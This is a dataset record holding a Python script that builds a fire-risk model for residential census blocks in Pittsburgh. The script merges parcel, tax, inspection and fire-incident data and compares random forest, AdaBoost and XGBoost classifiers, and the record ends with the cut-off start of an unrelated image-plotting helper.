city')]\nparcel_blocks = parcel[['PIN', 'TRACTCE10', 'BLOCKCE10']]\n#get first digit of block, convert to int\nparcel_blocks['BLOCKCE10'] = parcel_blocks['BLOCKCE10'].astype(str).str[0].astype(float)\n#ignore bad parcels\nparcel_blocks = parcel_blocks[parcel_blocks['PIN'] != ' ']\nparcel_blocks = parcel_blocks[parcel_blocks['PIN'] != 'COMMON GROUND']\nparcel_blocks = parcel_blocks[~parcel_blocks['PIN'].str.match('.*County')]\nparcel_blocks=parcel_blocks.drop_duplicates()\n\n\n# #### 1.1 Aggregate pittdata to census block, then merge with acs data\n\n# In[3]:\n\npittdata_blocks=pd.merge(pittdata, parcel_blocks, how='left', left_on=['PARID'], right_on=['PIN'])\n#drop extra columns\npittdata_blocks = pittdata_blocks.drop(['PARID','PIN','PROPERTYHOUSENUM','PROPERTYADDRESS'], axis=1)\n\n\n#group by blocks\ngrouped = pittdata_blocks.groupby(['TRACTCE10','BLOCKCE10'])\n#change the '-DESC' columns to the most common in each group (block)\n#change the other columns to the mean\nmax_count = lambda x:x.value_counts().index[0]\npittdata_blocks = grouped.agg({\n 'MUNIDESC':max_count,'SCHOOLDESC':max_count,'NEIGHCODE':max_count,\n 'TAXDESC':max_count,'OWNERDESC':max_count,'USEDESC':max_count,'LOTAREA':np.mean,\n 'SALEPRICE':np.mean,'FAIRMARKETBUILDING':np.mean,'FAIRMARKETLAND':np.mean\n})\n#reset index to columns\npittdata_blocks = pittdata_blocks.reset_index(level=[0,1])\n#merge pittdata with acs\npittacs = pd.merge(pittdata_blocks, acs_data_combined, how='inner', on=['BLOCKCE10','TRACTCE10'])\n\n# keep a copy of blocks and tracts\nblocks = pittacs[['TRACTCE10','BLOCKCE10']].drop_duplicates()\n\n\n# #### 1.2 merge plidata with census block¶\n\n# In[4]:\n\n#group by blocks\nplidata_blocks = pd.merge(plidata, parcel_blocks, how='left', left_on=['PARCEL'], right_on=['PIN'])\n#drop extra columns\nplidata_blocks = plidata_blocks.drop(['PARCEL','PIN'], axis=1)\nplidata_blocks=plidata_blocks.dropna(subset=['TRACTCE10','BLOCKCE10'])\n\n\n# #### 1.3 Aggregate taxdata to census block¶\n\n# In[5]:\n\n# group by blocks\ntaxdata_blocks = pd.merge(taxdata,parcel_blocks, how='left', left_on=['pin'], right_on=['PIN'])\ntaxdata_blocks = taxdata_blocks.drop(['pin','PIN'],axis=1)\ntaxdata_blocks = taxdata_blocks.dropna(subset=['TRACTCE10','BLOCKCE10'])\n\n\n# ### 2. Clean fire incident data\n\n# In[6]:\n\n# loading fire incidents csvs\nfire_pre14 = pd.read_csv(os.path.join(dataset_path, \"Fire_Incidents_Pre14.csv\"), encoding='latin-1', dtype={'street': 'str', 'number': 'str'}, low_memory=False)\nfire_new = pd.read_csv(os.path.join(dataset_path, \"Fire_Incidents_New.csv\"), encoding='utf-8', dtype={'street': 'str', 'number': 'str'}, low_memory=False)\n\n# cleaning columns of fire_pre14\nfire_pre14['full.code'] = fire_pre14['full.code'].str.replace(' -', ' -')\nfire_pre14['st_type'] = fire_pre14['st_type'].str.strip()\nfire_pre14['street'] = fire_pre14['street'].str.strip()\nfire_pre14['number'] = fire_pre14['number'].str.strip()\nfire_pre14['st_type'] = fire_pre14['st_type'].str.replace('AV', 'AVE')\nfire_pre14['street'] = fire_pre14['street'].str.strip() + ' ' + fire_pre14['st_type'].str.strip()\n\n# drop irrelevant columns\npre14_drop = ['Unnamed: 0','PRIMARY_UNIT', 'MAP_PAGE', 'alm_dttm', 'arv_dttm', 'XCOORD', \n 'YCOORD','inci_id', 'inci_type', 'alarms', 'st_prefix',\n 'st_suffix', 'st_type', 'CALL_NO','descript','ï..AGENCY']\nfor col in pre14_drop:\n del fire_pre14[col]\n\n\npost14_drop = ['alm_dttm', 'arv_dttm', 'XCOORD', 'YCOORD', 'alarms', \n 'inci_type', 'CALL_NO','descript']\nfor col in post14_drop:\n del fire_new[col]\n\n# joining both the fire incidents file together\nfire_new = fire_new.append(fire_pre14, ignore_index=True)\nfire_new = fire_new[fire_new['full.code'].str.strip() != '540 - Animal problem, Other']\nfire_new = fire_new[fire_new['full.code'].str.strip() != '5532 - Public Education (Station Visit)']\nfire_new = fire_new[fire_new['full.code'].str.strip() != '353 - Removal of victim(s) from stalled elevator']\n\n# correcting problems with the street column\nfire_new['street'] = fire_new['street'].replace(to_replace=', PGH', value='', regex=True)\nfire_new['street'] = fire_new['street'].replace(to_replace=', P', value='', regex=True)\nfire_new['street'] = fire_new['street'].replace(to_replace=',', value='', regex=True)\nfire_new['street'] = fire_new['street'].replace(to_replace='#.*', value='', regex=True)\nfire_new['street'] = fire_new['street'].str.strip()\nfire_new['number'] = fire_new['number'].str.strip()\n\n# converting to date time and extracting year\nfireDate, fireTime = fire_new['CALL_CREATED_DATE'].str.split(' ', 1).str\nfire_new['CALL_CREATED_DATE'] = fireDate\nfire_new['CALL_CREATED_DATE'] = pd.to_datetime(fire_new['CALL_CREATED_DATE'])\nfire_new['fire_year'] = fire_new['CALL_CREATED_DATE'].map(lambda x: x.year)\n\n# removing all codes with less than 20 occurences\nfor col, val in fire_new['full.code'].value_counts().iteritems():\n if val < 20 and col[0] != '1':\n fire_new = fire_new[fire_new['full.code'] != col]\n\n#Split street column when there are 2 streets\nstreet_split = fire_new['street'].str.split('/')\nfire_new['street'] = street_split.map(lambda x:x[0])\nfire_new = fire_new.dropna(subset=['CALL_CREATED_DATE'])\nfire_new = fire_new.drop_duplicates()\n\n\n# #### 2.1 merge fire incident to census block\n\n# In[7]:\n\n# convert from addresses to parcels\nfire_parcel = pd.merge(fire_new, address_parcels, how='inner',\n left_on=['street','number'], right_on=['PROPERTYADDRESS','PROPERTYHOUSENUM'])\n# convert from parcels to census blocks\nfire_blocks = pd.merge(fire_parcel, parcel_blocks, how='left',left_on=['PARID'], right_on=['PIN'])\n#drop extra columns\nfire_blocks=fire_blocks.drop(['number','street','PARID','PROPERTYADDRESS',\n 'PROPERTYHOUSENUM','PIN', 'Unnamed: 0',\n 'st_prefix', 'st_suffix', 'st_type',\n 'prop_use_code','response_time',\n 'CALL_TYPE_FINAL', 'COUNCIL', 'NEIGHBORHOOD',\n 'PRIMARY_UNIT','fire_year','prop_use_descript'],axis=1)\n#drop data without block or tract (this drops non-residential data)\nfire_blocks = fire_blocks.dropna(subset=['TRACTCE10','BLOCKCE10'])\n# dropping columns with less than 15% data\nfire_blocks = fire_blocks.dropna(thresh=len(fire_blocks)*0.15, axis=1)\nfire_blocks = fire_blocks.drop_duplicates()\n\n\n# ### 3 Join four datasets together\n# \n# #### 3.1 joining dynamic data with fire incidents\n\n# In[8]:\n\n# making the fire column with all type 100s as fires and map it to 0 or 1\nfire_blocks['fire'] = fire_blocks['full.code'].astype(str). map(lambda x: 1 if x[0]=='1' else 0)\n# keep non-fire incidents as features\nnonfire_incidents = fire_blocks[fire_blocks['fire'] != 1]\nnonfire_incidents = nonfire_incidents[['CALL_CREATED_DATE','full.code','TRACTCE10', 'BLOCKCE10']]\nfire_blocks.drop('full.code',axis=1,inplace=True)\n\n\n# group by every certain period of time\n# reason for setting period to year: tax data is based on year\nperiod = 'A'\nfire_groups = fire_blocks.groupby(pd.Grouper(key='CALL_CREATED_DATE', freq=period))\nnonfire_groups = nonfire_incidents.groupby(pd.Grouper(key='CALL_CREATED_DATE', freq=period))\nplidata_groups = plidata_blocks.groupby(pd.Grouper(key='INSPECTION_DATE', freq=period))\ntaxdata_groups = taxdata_blocks.groupby(pd.Grouper(key='tax_year', freq=period))\n\n# get the date of the earliest fire in each block in each year\nblock_fire_dates = fire_groups.apply(lambda x:x.groupby(['TRACTCE10','BLOCKCE10']).apply(lambda x:x[x['fire']==1].min()))\n\n# then group fire by census blocks\ndef groupByBlock(df,categoricals, method):\n dummies=[pd.get_dummies(df[feature]) for feature in categoricals]\n df = pd.concat([df]+dummies,axis=1)\n df.drop(categoricals,axis=1,inplace=True)\n df = pd.merge(df, blocks, how='right',on=['TRACTCE10','BLOCKCE10'])\n df_grouped=df.groupby(['TRACTCE10','BLOCKCE10'])\n if method == 'max':\n df_grouped=df_grouped.max()\n if method == 'sum':\n df_grouped=df_grouped.sum()\n return df_grouped\nfire_divided = fire_groups.apply(groupByBlock,categoricals=[],method='max')\nfire_divided.drop('CALL_CREATED_DATE',axis=1,inplace=True)\nfire_divided=fire_divided.reset_index()\nfire_divided=fire_divided.fillna(0)\n\n\n# group nonfire incidents by census blocks\ndef groupByBlockNonfire(df, categoricals, method):\n # only keep data that occurred before the fire\n year = df['CALL_CREATED_DATE'].iloc[0].year\n df = pd.merge(df, block_fire_dates[block_fire_dates['CALL_CREATED_DATE'].dt.year == year], how='left',\n on=['TRACTCE10', 'BLOCKCE10'], suffixes=['', '_F'])\n df['CALL_CREATED_DATE_F'] = df['CALL_CREATED_DATE_F'].fillna(pd.to_datetime('12-31-' + str(year)))\n df = df[df['CALL_CREATED_DATE'] <= df['CALL_CREATED_DATE_F']]\n df = df.drop(['CALL_CREATED_DATE_F', 'fire'], axis=1)\n\n dummies = [pd.get_dummies(df[feature]) for feature in categoricals]\n df = pd.concat([df] + dummies, axis=1)\n df.drop(categoricals, axis=1, inplace=True)\n df = pd.merge(df, blocks, how='right', on=['TRACTCE10', 'BLOCKCE10'])\n df_grouped = df.groupby(['TRACTCE10', 'BLOCKCE10'])\n if method == 'max':\n df_grouped = df_grouped.max()\n if method == 'sum':\n df_grouped = df_grouped.sum()\n return df_grouped\n\nnonfire_divided = nonfire_groups.apply(groupByBlockNonfire,categoricals=['full.code'],method='sum')\nnonfire_divided=nonfire_divided.reset_index()\nnonfire_divided=nonfire_divided.fillna(0)\n\n\n# group pli incidents by census blocks\ndef groupByBlock_pli(df):\n # only keep data that occurred before the fire\n year = df['INSPECTION_DATE'].iloc[0].year\n df = pd.merge(df, block_fire_dates[block_fire_dates['CALL_CREATED_DATE'].dt.year == year], how='left',\n on=['TRACTCE10', 'BLOCKCE10'])\n df['CALL_CREATED_DATE'] = df['CALL_CREATED_DATE'].fillna(pd.to_datetime('12-31-' + str(year)))\n df = df[df['INSPECTION_DATE'] <= df['CALL_CREATED_DATE']]\n df = df.drop(['CALL_CREATED_DATE', 'fire'], axis=1)\n \n INSPECTION_RESULT_dummies=pd.get_dummies(df['INSPECTION_RESULT'])\n VIOLATION_dummies=df['VIOLATION'].str.get_dummies(sep=' :: ')\n df = pd.concat([df,INSPECTION_RESULT_dummies,VIOLATION_dummies],axis=1)\n df.drop(['INSPECTION_RESULT','VIOLATION','violation_year'],axis=1,inplace=True)\n df = pd.merge(df, blocks, how='right',on=['TRACTCE10','BLOCKCE10'])\n df_grouped=df.groupby(['TRACTCE10','BLOCKCE10']).sum()\n return df_grouped\npli_divided=plidata_groups.apply(groupByBlock_pli)\npli_divided=pli_divided.reset_index()\npli_divided=pli_divided.fillna(0)\n\n\n# group tax data by census blocks\ndef groupByBlock_tax(df):\n tax_dummies=pd.get_dummies(df['lien_description'])\n df = pd.concat([df,tax_dummies],axis=1)\n df.drop(['lien_description'],axis=1,inplace=True)\n df = pd.merge(df, blocks, how='right',on=['TRACTCE10','BLOCKCE10'])\n df_grouped=df.groupby(['TRACTCE10','BLOCKCE10']).sum()\n return df_grouped\n\ntax_divided=taxdata_groups.apply(groupByBlock,categoricals=['lien_description'],method='sum')\ntax_divided=tax_divided.reset_index()\ntax_divided=tax_divided.fillna(0)\n\n\n# join fire, nonfire, pli, tax data together\nfire_nonfire = pd.merge(fire_divided,nonfire_divided,how='outer',\n on=['CALL_CREATED_DATE','TRACTCE10','BLOCKCE10'])\nfire_nonfire_pli = pd.merge(fire_nonfire,pli_divided,how='outer',\n left_on=['CALL_CREATED_DATE','TRACTCE10','BLOCKCE10'],\n right_on=['INSPECTION_DATE','TRACTCE10','BLOCKCE10'])\nfire_nonfire_pli_tax = pd.merge(fire_nonfire_pli,tax_divided,how='outer',\n left_on=['CALL_CREATED_DATE','TRACTCE10','BLOCKCE10'],\n right_on=['tax_year','TRACTCE10','BLOCKCE10'])\nfire_nonfire_pli_tax['CALL_CREATED_DATE']=fire_nonfire_pli_tax['CALL_CREATED_DATE'].fillna(fire_nonfire_pli_tax['CALL_CREATED_DATE'])\nfire_nonfire_pli_tax.drop(['INSPECTION_DATE','tax_year'],axis=1,inplace=True)\n\n\n# drop columns with less than thresold% data\nthreshold=0.0001\ns=fire_nonfire_pli_tax.sum()\ndrop_columns=s[s val_cutoffdate]\nfs_train_data = encoded_traindata[encoded_traindata.CALL_CREATED_DATE <= val_cutoffdate]\n\nvaluation_data = valuation_data.drop(['CALL_CREATED_DATE','TRACTCE10','BLOCKCE10'], axis=1)\nfs_train_data = fs_train_data.drop(['CALL_CREATED_DATE','TRACTCE10','BLOCKCE10'], axis=1)\n\nencoded_traindata.drop(['CALL_CREATED_DATE','TRACTCE10','BLOCKCE10'],axis=1,inplace=True)\nencoded_traindata.fillna(0)\nX_train=np.array(encoded_traindata.drop(['fire'],axis=1))\ny_train=np.array(encoded_traindata['fire'])\n\n# preparing test set\nencoded_testdata = encoded_combined[encoded_combined.CALL_CREATED_DATE > cutoffdate]\nencoded_testdata.drop(['CALL_CREATED_DATE','TRACTCE10','BLOCKCE10'],axis=1,inplace=True)\nencoded_testdata.fillna(0)\nX_test=np.array(encoded_testdata.drop(['fire'],axis=1))\ny_test=np.array(encoded_testdata['fire'])\n\n#converting to array and reshaping the data to prep for model\nfireVarTrain = encoded_traindata['fire']\n#del encoded_traindata['fire']\nno_fire_train = encoded_traindata.drop(['fire'], axis =1)\nX_train = np.array(no_fire_train)\ny_train = np.reshape(fireVarTrain.values,[fireVarTrain.shape[0],])\n\n#converting to array and reshaping the data to prep for model\nfireVarTest = encoded_testdata['fire']\n#del encoded_testdata['fire']\nno_fire_test = encoded_testdata.drop(['fire'], axis =1)\n#dropping fire attribute to make fire valuation dataset later\nX_test = np.array(no_fire_test)\ny_test = np.reshape(fireVarTest.values,[fireVarTest.shape[0],])\n\nX_validation = np.array(fs_train_data.drop(['fire'], axis=1))\ny_validation = np.array(fs_train_data['fire'])\n\n\n# ### 5 Experimented with RF, Adaboost, XGBoost \n\n# In[10]:\n\n# Random Forest model\nfrom sklearn.ensemble import RandomForestClassifier\n\nmodel_rf = RandomForestClassifier(n_estimators = 65)\nprint(model_rf)\nmodel_rf.fit(X_train, y_train)\npred_rf = model_rf.predict(X_test)\nreal = y_test\ncm_rf = confusion_matrix(real, pred_rf)\nprint(cm_rf)\n\nkappa_rf = cohen_kappa_score(real, pred_rf)\n\nfpr, tpr, thresholds = metrics.roc_curve(y_test, pred_rf, pos_label=1)\nroc_auc = metrics.auc(fpr, tpr)\n\nacc_rf = 'Accuracy = {0} \\n \\n'.format(float(cm_rf[0][0] + cm_rf[1][1]) / len(real))\nkapp_rf = 'kappa score = {0} \\n \\n'.format(kappa_rf)\nauc_rf = 'AUC Score = {0} \\n \\n'.format(metrics.auc(fpr, tpr))\nrecall_rf = 'recall = {0} \\n \\n'.format(tpr[1])\nprecis_rf = 'precision = {0} \\n \\n'.format(float(cm_rf[1][1]) / (cm_rf[1][1] + cm_rf[0][1]))\n\n\nprint(acc_rf)\nprint(kapp_rf)\nprint(auc_rf)\nprint(recall_rf)\nprint(precis_rf)\n\n\n# In[11]:\n\nfrom sklearn.ensemble import AdaBoostClassifier\nmodel_adaboost = AdaBoostClassifier(n_estimators = 100, random_state=27, algorithm='SAMME.R')\nprint(model_adaboost)\nmodel_adaboost.fit(X_train, y_train)\n#pred_adaboost = model_adaboost.predict(X_validation)\npred_adaboost = model_adaboost.predict(X_test)\n#real_adaboost = y_validation\nreal_adaboost = y_test\ncm_ada = confusion_matrix(real_adaboost, pred_adaboost)\nprint(cm_ada)\n\nkappa_ada = cohen_kappa_score(real_adaboost, pred_adaboost)\n\n#compute ROC curve and area under the curve\n# fpr, tpr, thresholds = metrics.roc_curve(y_validation, pred_adaboost, pos_label=1)\nfpr, tpr, thresholds = metrics.roc_curve(y_test, pred_adaboost, pos_label=1)\nroc_auc = metrics.auc(fpr, tpr)\n\nacc_ada = 'Accuracy = {0} \\n \\n'.format(float(cm_ada[0][0] + cm_ada[1][1]) / len(real_adaboost))\nkapp_ada = 'kappa score = {0} \\n \\n'.format(kappa_ada)\nauc_ada = 'AUC Score = {0} \\n \\n'.format(metrics.auc(fpr, tpr))\nrecall_ada = 'recall = {0} \\n \\n'.format(tpr[1])\nprecis_ada = 'precision = {0} \\n \\n'.format(float(cm_ada[1][1]) / (cm_ada[1][1] + cm_ada[0][1]))\n\nprint(acc_ada)\nprint(kapp_ada)\nprint(auc_ada)\nprint(recall_ada)\nprint(precis_ada)\n\n\n# In[12]:\n\n# The XG Boost model\nmodel_xgboost = XGBClassifier(learning_rate=0.13, n_estimators=1500,\n objective='binary:logistic',nthread=4,seed=27)\nprint(model_xgboost)\nmodel_xgboost.fit(X_train, y_train)\n# pred_xgboost = model_xgboost.predict(X_validation)\npred_xgboost = model_xgboost.predict(X_test)\n# real_xgboost = y_validation\nreal_xgboost = y_test\ncm_xg = confusion_matrix(real_xgboost, pred_xgboost)\nprint(cm_xg)\n\nfrom sklearn.metrics import cohen_kappa_score\nkappa_xg = cohen_kappa_score(real_xgboost, pred_xgboost)\n\nfpr, tpr, thresholds = metrics.roc_curve(y_test, pred_xgboost, pos_label=1)\nroc_auc = metrics.auc(fpr, tpr)\n\nacc_xg = 'Accuracy = {0} \\n \\n'.format(float(cm_xg[0][0] + cm_xg[1][1]) / len(real_xgboost))\nkapp_xg = 'kappa score = {0} \\n \\n'.format(kappa_xg)\nauc_xg = 'AUC Score = {0} \\n \\n'.format(metrics.auc(fpr, tpr))\nrecall_xg = 'recall = {0} \\n \\n'.format(tpr[1])\nprecis_xg = 'precision = {0} \\n \\n'.format(float(cm_xg[1][1]) / (cm_xg[1][1] + cm_xg[0][1]))\n\nprint(acc_xg)\nprint(kapp_xg)\nprint(auc_xg)\nprint(recall_xg)\nprint(precis_xg)\n\n\n# ### 6 Feature selection on model with best performance\n\n# In[13]:\n\nprint(\"Start Feature Selection\")\n# ==== Feature Selection using Feature Importance =====\nfrom sklearn.feature_selection import SelectFromModel\nfrom sklearn.metrics import accuracy_score\n\n\n# calculate imputed test dataset\nimputed_fireVarTest = fireVarTest.fillna(method=\"ffill\")\nimpute_X_test = np.array(encoded_testdata.drop('fire',axis=1).fillna(method=\"ffill\"))\nimpute_y_test = np.reshape(imputed_fireVarTest.values, [imputed_fireVarTest.shape[0],])\n\n#model for feature selection\nselection_model = RandomForestClassifier(n_estimators = 60, max_depth=3, random_state=27)\n\n# create the list of features with corresponding feature importances\nfeature_importance = pd.Series(data=model_rf.feature_importances_, index=encoded_traindata.drop(['fire'], axis =1).columns)\n\n\n#sort the feature importance from low to hi\nfeature_importance = feature_importance.sort_values()\n# Making threshold smaller\nthresh_num = X_validation.shape[1]\n\nfeature_result = pd.DataFrame(columns=('Last_Feature', 'Thresh', 'Acc', 'Kapp', 'AUC', 'Recall', 'Precis'))\nlow_thresh = feature_importance[0]\n# print(feature_importance[0])\n\n\n# In[14]:\n\n#model for feature selection\nselection_model = RandomForestClassifier(n_estimators = 60, max_depth=3, random_state=27)\n\n# create the list of features with corresponding feature importances\nfeature_importance = pd.Series(data=model_rf.feature_importances_, index=encoded_traindata.drop(['fire'], axis =1).columns)\n\n\n#sort the feature importance from low to hi\nfeature_importance = feature_importance.sort_values()\n# Making threshold smaller\nthresh_num = X_validation.shape[1]\n\nfeature_result = pd.DataFrame(columns=('Last_Feature', 'Thresh', 'Acc', 'Kapp', 'AUC', 'Recall', 'Precis'))\nlow_thresh = feature_importance[0]\nprint(feature_importance[0])\nfor i in range(feature_importance.size-thresh_num, feature_importance.size-2):\n # select features using threshold\n if feature_importance[i] == low_thresh:\n continue\n else:\n low_thresh = feature_importance[i]\n# print(feature_importance[i])\n selection = SelectFromModel(model_rf, threshold=feature_importance[i], prefit=True)\n select_X_train = selection.transform(X_train)\n\n selection_model.fit(select_X_train, y_train)\n\n select_X_test = selection.transform(X_validation)\n y_pred = selection_model.predict(select_X_test)\n predictions = [round(value) for value in y_pred]\n #metric calculation\n fpr, tpr, thresholds = metrics.roc_curve(y_validation, predictions, pos_label=1)\n accuracy = accuracy_score(y_validation, predictions)\n cm = confusion_matrix(y_validation, predictions)\n# print(confusion_matrix(y_validation, predictions))\n\n kappa = cohen_kappa_score(y_validation, predictions)\n acc = float(cm[0][0] + cm[1][1]) / len(y_validation)\n auc = metrics.auc(fpr, tpr)\n recall = tpr[1]\n precis = float(cm[1][1]) / (cm[1][1] + cm[0][1])\n\n# print(\"Thresh=%.3f, n=%d\" % (feature_importance[i], select_X_train.shape[1]))\n# print('Accuracy = {0} \\n \\n'.format(acc))\n# print('kappa score = {0} \\n \\n'.format(kappa))\n# print('AUC Score = {0} \\n \\n'.format(auc))\n# print('recall = {0} \\n \\n'.format(recall))\n# print('precision = {0} \\n \\n'.format(precis))\n\n feature_result.loc[i] = [feature_importance.index[i], feature_importance[i], acc, kappa, auc, recall, precis]\n\n#find the best f1\nfeature_result['F1'] = 2* (feature_result['Recall']*feature_result['Precis']) / (feature_result['Recall']+feature_result['Precis'])\nmax_f1 = feature_result['F1'].idxmax()\nbest_row = feature_result.loc[feature_result['F1'].idxmax()]\nprint(\"best row:\")\nprint(best_row)\n\n\n# In[15]:\n\nfeature_result.to_csv(\"{0}Feature_Selection_Results{1}.csv\".format(inter_path,datetime.datetime.now().strftime('%m%d-%H%M%S')), 'a')\n\n\n# ### 7 grid search\n\n# In[16]:\n\n# grid search on random forest \nthres = feature_result.loc[feature_result['F1'] == feature_result['F1'][max_f1]]\n\nfrom sklearn.model_selection import GridSearchCV\nfrom sklearn.metrics import classification_report\nfrom sklearn.model_selection import TimeSeriesSplit\n\n\nselection = SelectFromModel(model_rf, threshold=thres.iloc[0]['Thresh'], prefit=True)\nselect_X_train = selection.transform(X_train)\nselect_X_test = selection.transform(impute_X_test)\n\nscores=['recall_macro']\ntscv =TimeSeriesSplit(n_splits=3) \n\ntuned_parameters= {'n_estimators':[1,10,50, 60,100,500],\n 'max_depth':[None,3,5,10,20],\n 'max_features':['sqrt','log2']}\nprint (\"## Tuning for %s\"%model_rf)\nfor score in scores:\n print(\"# Tuning hyper-parameters for %s\" % score)\n print()\n\n clf = GridSearchCV(model_rf, tuned_parameters, cv=tscv,scoring= score)\n print('Model setted up')\n clf.fit(select_X_train, y_train)\n\n print(\"Best parameters set found on development set:\")\n print()\n print(clf.best_params_)\n print()\n print(\"Grid scores on development set:\")\n print()\n means = clf.cv_results_['mean_test_score']\n stds = clf.cv_results_['std_test_score']\n for mean, std, params in zip(means, stds, clf.cv_results_['params']):\n print(\"%0.3f (+/-%0.03f) for %r\"% (mean, std * 2, params))\n print()\n\n print(\"Detailed classification report:\")\n print()\n print(\"The model is trained on the full development set.\")\n print(\"The scores are computed on the full evaluation set.\")\n print()\n y_true, y_pred = y_test, clf.predict(select_X_test)\n print(classification_report(y_true, y_pred))\n print()\n\n\n# In[17]:\n\n# grid search on adaboost\ntuned_parameters={'algorithm': ['SAMME','SAMME.R'],'n_estimators':[1,10,100,1000,10000]}\nprint (\"## Tuning for %s\"%'adaboost')\nscore='recall_macro'\ntscv =TimeSeriesSplit(n_splits=3) \nprint(\"# Tuning hyper-parameters for %s\" % score)\nprint()\n\nclf = GridSearchCV(model_adaboost, tuned_parameters, cv=tscv,scoring= score)\nprint('Model setted up')\nclf.fit(select_X_train, y_train)\n\nprint(\"Best parameters set found on development set:\")\nprint()\nprint(clf.best_params_)\nprint()\nprint(\"Grid scores on development set:\")\nprint()\nmeans = clf.cv_results_['mean_test_score']\nstds = clf.cv_results_['std_test_score']\nfor mean, std, params in zip(means, stds, clf.cv_results_['params']):\n print(\"%0.3f (+/-%0.03f) for %r\"% (mean, std * 2, params))\nprint()\n\nprint(\"Detailed classification report:\")\nprint()\nprint(\"The model is trained on the full development set.\")\nprint(\"The scores are computed on the full evaluation set.\")\nprint()\ny_true, y_pred = y_test, clf.predict(select_X_test)\nprint(classification_report(y_true, y_pred))\nprint()\n\n\n# ### 8 test on the test data\n\n# In[18]:\n\n#test on the test data\ntuned_model = RandomForestClassifier(n_estimators = 500, max_depth=10, random_state=27,max_features='log2')\ntuned_model.fit(select_X_train, y_train)\ny_pred = tuned_model.predict(select_X_test)\npredictions = [round(value) for value in y_pred]\nfpr, tpr, thresholds = metrics.roc_curve(impute_y_test, predictions, pos_label=1)\naccuracy = accuracy_score(impute_y_test, predictions)\ncm = confusion_matrix(impute_y_test, predictions)\nprint(confusion_matrix(impute_y_test, predictions))\n\nkappa = cohen_kappa_score(impute_y_test, predictions)\nacc = float(cm[0][0] + cm[1][1]) / len(impute_y_test)\nauc = metrics.auc(fpr, tpr)\nrecall = tpr[1]\nprecis = float(cm[1][1]) / (cm[1][1] + cm[0][1])\n\nprint('Final Test Data Results')\nprint(\"Thresh=%d, n=%d\" % (thres.iloc[0]['Thresh'], select_X_test.shape[1]))\nprint('Accuracy = {0} \\n \\n'.format(acc))\nprint('kappa score = {0} \\n \\n'.format(kappa))\nprint('AUC Score = {0} \\n \\n'.format(auc))\nprint('recall = {0} \\n \\n'.format(recall))\nprint('precision = {0} \\n \\n'.format(precis))\n\n\n#Tree model for getting features importance\nclf = ExtraTreesClassifier()\n\nclf = clf.fit(X_train, y_train)\n\n\nUsedDf = encoded_traindata.drop('fire',axis=1)\nimportant_features = pd.Series(data=clf.feature_importances_,index=UsedDf.columns)\nimportant_features.sort_values(ascending=False,inplace=True)\n#top 20 features\nprint(important_features[0:20])\n\n#Plotting the top 20 features\ny_pos = np.arange(len(important_features.index[0:20]))\n\nplt.bar(y_pos,important_features.values[0:20], alpha=0.3)\nplt.xticks(y_pos, important_features.index[0:20], rotation = (90), fontsize = 11, ha='left')\nplt.ylabel('Feature Importance Scores')\nplt.title('Feature Importance')\n\n\n# Write model performance to log file:\nlog_path = os.path.join(curr_path, \"log/\")\nimportant_features[0:50].to_csv('{0}FeatureImportanceList_{1}.csv'.format(log_path, datetime.datetime.now().strftime('%m%d-%H%M%S')), 'a')\n\n\n# #### 8.1 Distribution of census block at each risk level\n\n# In[19]:\n\nproba = tuned_model.predict_proba(select_X_test)\nplt.hist(proba[:,1],bins=[0,0.3, 0.7,1])\n\n\n# #### 8.2 ROC curve\n\n# In[25]:\n\nfrom sklearn.model_selection import TimeSeriesSplit\n# from sklearn.model_selection import KFold\nfrom scipy import interp\n\nmodels = [model_adaboost,model_xgboost,tuned_model]\nsignature = [\"adaboost\",\"xgboost\",\"RF\"] \nfor d in range(len(models)):\n model=models[d]\n print(model)\n tprs = []\n aucs = []\n mean_fpr = np.linspace(0, 1, 100)\n # 7-fold time series cv because training data contains 8 years of records.\n tscv =TimeSeriesSplit(n_splits=7) \n # cv = KFold(n_splits=10)\n i = 0\n plt.figure(figsize=(8,6))\n for train, test in tscv.split(select_X_train, y_train):\n probas_ = model.fit(select_X_train[train], y_train[train]).predict_proba(select_X_train[test])\n # Compute ROC curve and area the curve\n fpr, tpr, thresholds = metrics.roc_curve(y_train[test], probas_[:,1])\n tprs.append(interp(mean_fpr, fpr, tpr))\n tprs[-1][0] = 0.0\n roc_auc = metrics.auc(fpr, tpr)\n aucs.append(roc_auc)\n plt.plot(fpr, tpr, lw=1, alpha=0.3,\n label='ROC fold %d (AUC = %0.2f)' % (i, roc_auc))\n\n i += 1\n plt.plot([0, 1], [0, 1], linestyle='--', lw=2, color='r',\n label='Luck', alpha=.8)\n\n mean_tpr = np.mean(tprs, axis=0)\n mean_tpr[-1] = 1.0\n mean_auc = metrics.auc(mean_fpr, mean_tpr)\n std_auc = np.std(aucs)\n plt.plot(mean_fpr, mean_tpr, color='b',\n label=r'Mean ROC (AUC = %0.2f $\\pm$ %0.2f)' % (mean_auc, std_auc),\n lw=2, alpha=.8)\n\n std_tpr = np.std(tprs, axis=0)\n tprs_upper = np.minimum(mean_tpr + std_tpr, 1)\n tprs_lower = np.maximum(mean_tpr - std_tpr, 0)\n plt.fill_between(mean_fpr, tprs_lower, tprs_upper, color='grey', alpha=.2,\n label=r'$\\pm$ 1 std. dev.')\n\n plt.xlim([-0.05, 1.05])\n plt.ylim([-0.05, 1.05])\n plt.xlabel('False Positive Rate')\n plt.ylabel('True Positive Rate')\n# plt.title('Receiver operating characteristic example')\n plt.legend(loc=\"lower right\")\n features_png = \"{0}roc_{1}_{2}.png\".format(png_path, signature[d], datetime.datetime.now().strftime('%m%d-%H%M%S'), 'a')\n plt.savefig(features_png, dpi=150)\n plt.show()\n\n\n\n\n\n","repo_name":"Eve-Chen/fire_risk_residential","sub_path":"risk_model_residential_kdd.py","file_name":"risk_model_residential_kdd.py","file_ext":"py","file_size_in_byte":35291,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"33725821687","text":"''' Set of functions for plotting results of using classes in\n radial_split.py & color_density.py '''\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\ndef plot_radial_splits(img_file, rs, ax, color='r'):\n '''Displays an image with the radial split overlay\n\n Parameters\n ----------\n img_file: str\n Path to image file\n rs: RadialSplitter object\n Instance of the RadialSplitter class from radial_split.py\n ax: matplotlib Axes\n Axes in which to display the image\n color: str or tuple\n Color for overlay lines (argument for matplotlib functions)\n '''\n\n img = plt.imread(img_file) # read image file\n _ = rs.split(img) # apply RadialSplitter to generate vertices\n vs = rs.vertices[:, :, ::-1].copy() # get vertices of splits\n\n for y in range(rs.nqslices * 4 + 1): # loop that will cover every segment\n for r in range(rs.nrings):\n ax.plot(*[vs[r:r + 2, y, i]\n for i in [0, 1]], color=color, linewidth=2)\n ax.plot(*[vs[r, 